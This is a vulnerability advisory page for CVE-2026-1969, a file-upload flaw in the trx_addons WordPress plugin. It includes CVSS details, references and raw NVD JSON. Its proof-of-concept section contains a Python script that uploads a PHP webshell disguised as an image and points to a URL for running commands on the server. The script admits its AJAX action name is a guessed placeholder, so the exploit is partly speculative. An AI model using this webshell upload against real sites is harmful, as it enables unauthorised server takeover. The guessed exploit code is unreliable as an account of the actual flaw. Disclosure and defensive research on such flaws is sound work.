CVE-2026-1969

Description

The trx_addons WordPress plugin before 2.38.5 does not correctly validate file types in one of its AJAX action, allowing unauthenticated users to upload arbitrary file. This is due to an incorrect fix of CVE-2024-13448

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

trx_addons < 2.38.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-1969: Unauthenticated Arbitrary File Upload
    """
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload data for the vulnerable AJAX action
    # Note: The specific 'action' name depends on the plugin internals, usually 'trx_addons_upload_action' or similar.
    data = {
        'action': 'trx_addons_upload_action'  # Placeholder, replace with actual action name if known
    }
    
    # Malicious file to upload (PHP Webshell)
    files = {
        'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'image/jpeg')
    }
    
    try:
        response = requests.post(upload_url, data=data, files=files, timeout=10)
        if response.status_code == 200 and "success" in response.text.lower():
            print("[+] Exploit successful! File uploaded.")
            print(f"[+] Check uploaded file at: {target_url}/wp-content/uploads/shell.php?cmd=whoami")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1969
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1969
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1969/
[4] VulDB https://vuldb.com/cve/CVE-2026-1969
[5] https://wpscan.com/vulnerability/762530ae-80a5-4ff8-9725-6adab9498c33/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1969", "sourceIdentifier": "[email protected]", "published": "2026-03-23T06:16:20.257", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The trx_addons WordPress plugin before 2.38.5 does not correctly validate file types in one of its AJAX action, allowing unauthenticated users to upload arbitrary file. This is due to an incorrect fix of CVE-2024-13448"}, {"lang": "es", "value": "El plugin de WordPress trx_addons anterior a la versión 2.38.5 no valida correctamente los tipos de archivo en una de sus acciones AJAX, permitiendo a usuarios no autenticados subir un archivo arbitrario. Esto se debe a una corrección incorrecta de CVE-2024-13448."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wpscan.com/vulnerability/762530ae-80a5-4ff8-9725-6adab9498c33/", "source": "[email protected]"}]}}